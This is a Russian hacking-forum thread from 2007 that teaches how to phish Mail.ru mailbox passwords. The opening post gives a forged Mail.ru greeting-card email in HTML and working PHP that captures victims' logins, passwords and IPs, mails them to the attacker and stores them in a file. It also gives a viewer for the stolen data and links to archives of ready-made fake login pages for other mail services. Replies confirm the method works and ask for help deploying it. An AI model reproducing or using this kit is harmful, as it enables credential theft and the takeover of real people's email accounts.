PDA

Просмотр полной версии : Создание Фейка(Взлом ящика)


misterio
15.08.2007, 22:45
Итак, что нам нужно:
1. Хостинг где-нибудь(например holm.ru)
2. Прямые руки(в том числе и finger.dll) ;)
3. И ящик жертвы

1 Этап - Теория.
Как же оно работает:
Просто при заходе на сайт вы пишите своё имя и пароль в системе, а как мы это отправим смотрите дальше.
2 Этап - Отправка письма.
Значит можем дать просто ссылку на сайт или так отправить:
Нажимаем "Написать письмо", пишем кому, в поле "Тема" вводим "Вам пришла открытка", а сообщении пишем:


<table class=readlet cellpadding=0 cellspacing=0 border=0 width="100%"><tr>
<td>
<div id=let_body><base href="http://win.mail.ru/cgi-bin/readmsg"><table cellspacing=0 cellpadding=5><tr valign=top>
<td><a href="http://cards.mail.ru" target="_blank"><img src="http://images.cards.mail.ru/2006/avatar.gif" width=90 height=90 border=0></a></td>
<td><font color="#333333" face="Arial" size="2">

Здравствуйте, на Ваше имя отправлена открытка.<br>
Отправитель открытки: Открытки@Mail.Ru &lt;cards@cards.mail.ru&gt;</br><br>

Открытку Вы можете посмотреть в течение 90 дней по ссылке<br>
<a href="ССЫЛКА НА ВАШ САЙТ" target="_self"><font color=#0857A6>http://cards.mail.ru/card.html?cd=7b5fd891edc9120c2cd5c7abe302a1cc</font></a><br>
Нажмите на неё или скопируйте ссылку в адресную строку интернет-браузера.<br><br>
<br>
<hr align="left" color="silver" size="1" width="100%">
Чтобы своевременно узнавать о ближайших праздниках, именинниках и конкурсах,<br>

<a href="http://content.mail.ru/pages/p_782.html" target="_blank" _base_href="http://win.mail.ru/cgi-bin/readmsg"> подпишитесь на рассылку</a>.
<br><br>
<a href="http://cards.mail.ru/" target="_blank" _base_href="http://win.mail.ru/cgi-bin/readmsg"><font color="#0857a6">Открытки@Mail.Ru</font></a> - открытки на все случаи жизни!<br><br><br>


Потом жмём "расширанный режим" и жмём отправить...
Жертва прочитаем письмо, пройдёт по ссылке и напишет там свой пароль(Проверено - 99%)

3 Этап - Создание Собственного Фейка
Итак, рассмотрим способ создания фейка. Заходите на панель авторизации пользователя и нажимаете "Сохранить как" сохраняете её и потом переимёновываете в "index.php".
Затем создаем файл "base.php" и записываем туда следующее:

<? print "<center><h1>Stop!!!! Access Denide!</h1></center>"; exit; ?>

Это чтобы никто не смог посмотреть базу.
Создаете файл log.php и пихаете туда:

<?PHP
$Login = $_POST['login']; //Логин
$Domain = $_POST['domain'];
$Pass = $_POST['password']; // Пароль
$ip = $_SERVER["REMOTE_ADDR"]; // IP Жертвы
$Data = date("d-m-y H:i:s", time()); // Дата и время

$text = "[$Data] IP:$ip Мыло:$Login@$Domain Пасс:$Pass";
$to = "ВАШЕ МЫЛО"; // кому присылаем данные ( E-mail адресс )
$sub = " Пароль от ящика: $Login@$Domain"; // тема письма
mail($to,$sub,$text); // Отсылаем сообщение о пополнении базы на E-mail

$filelog = fopen("base.php","a+"); //открываем файл базы
fwrite($filelog,"\n $text \n"); //записываем всё
fclose($filelog); //закрываем

echo "<html><head><META HTTP-EQUIV='Refresh' content ='0; URL=http://cards.mail.ru/card.html?cdu=8fe03702cc03252da65651e35e098d9d'></head></html>"; // куда пошлем пользователя после того как он ввел данные!
?>

Тут всякие настройки.
И последнее, создаём файл seebase.php и пихаем туда:

<html>
<head>
<title>Give E-mail</title>
</head>
<body>
<form method="POST">
Login: <input type="text" name="login">
<br>
<input type="submit" value="OK">
</form>
<?php
if (isset($_POST['login']))
if ($_POST['login'] != '')
{
$login = $_POST['login'];
echo $_POST['login'].'<BR>';
$fp = fopen('base.php', 'r');// Имя базы
while (!feof ($fp)) {
$buffer = fgets($fp);
if (strpos($buffer,$login) !== false)
{
echo $buffer.'<BR>';
break;
}
}
fclose($fp);
}
?>
</body>
</html>

Это чтобы видеть базу через вебку, но лучше копировать с ftp base.php, чтобы лишние глаза не смогли посмотреть базу через seebase.php

Впринципе всё с этапом 3!



P.S. Скоро напишу как создавать фейки для других почтовых сервисов
P.S.S. Задавайте вопросы тут...

Готовые Фейки:
Mail.ru Фейк:
Ссылка:http://slil.ru/24741643
Пасс:feikmailru

Все фейки(Mail.ru;Rambler;UcoZ и Yandex.ru)
Ссылка: http://slil.ru/24745423
Пасс: allfeiks

Видео по использованию Фейка:
Ссылка: http://slil.ru/24745566
Пасс: videofeik

cataha01
16.08.2007, 00:35
Сам не проверял но на мне пробовали ...
Способ рабочий если несмотрят на адресную строку ....

А вобще 50% поведуться

DJ.KilleR
16.08.2007, 11:17
за страния плюс всё же поставлю..

Moldman
16.08.2007, 14:14
вроде работает

HloR09
18.08.2007, 20:28
А без расширенного режима можно как нибудь написать письмицо со скриптом , а то у меня на ящике нет расширенного режима или его надо включать в опциях почтовика

misterio
19.08.2007, 14:53
HloR09
какая у тебя почта? Mail? Если маил, то чтобы увидеть эту кнопку ты должен юзать Internet Explorer

Freki
19.08.2007, 15:24
Только расскажите пожалуйста как пользоваться фейком для Ucoz?

Moldman
19.08.2007, 15:38
Сможешь сделать фейк для Yahoo?
Пожалуйста

ya_mag
20.08.2007, 17:55
Сможешь сделать фейк для Yahoo?
Пожалуйста
Пользуйся на здоровье :) yahoo (http://rapidshare.com/files/50165777/yahoo.rar.html)

multic
20.08.2007, 20:09
Привет!Помоги еще чуток!Ответь ток пожалуйста на 2 вопроса:
1)зарегился я на holm.ru (куда все файлы закидывать надо) ? в раздел закачки все 4 файла иль их по разным разделам.
Подскажи те еще какие нить хосты где работает.А то holm лагает и еле еле прогружается!
2)в том что ты залито уже готовое тока в log.php над изменить файл ( там над поставить свое мыло вместо olya.88 вроде) иль еще что нить над изменять?
Буду очень благодарен за помощь!

ya_mag
20.08.2007, 23:33
всё будет работать и на холме! для работы также сгодится любой бесплатный хостинг с php! если не нравится холм попробуй fatal.ru все файлы кладутся в одну папку! файл seebase.php можеш вобще не ложить! он как такавой нафиг не нужен :) правиш log.php под себя и ставиш чмоды на base.php 666 вот и всё!

wano81
21.08.2007, 18:01
Товарищи просьба указывать копирайты тема в сети висит достаточно давно
inattack.ru

stalles
24.08.2007, 12:49
ети фейки делаются за 1 минуту, на любую почту и нетолько :)
И ето старое.
Эту тему нужно удалит, сами знаете почему.

Constantine
24.08.2007, 16:31
Зачем такие бояны постить? =\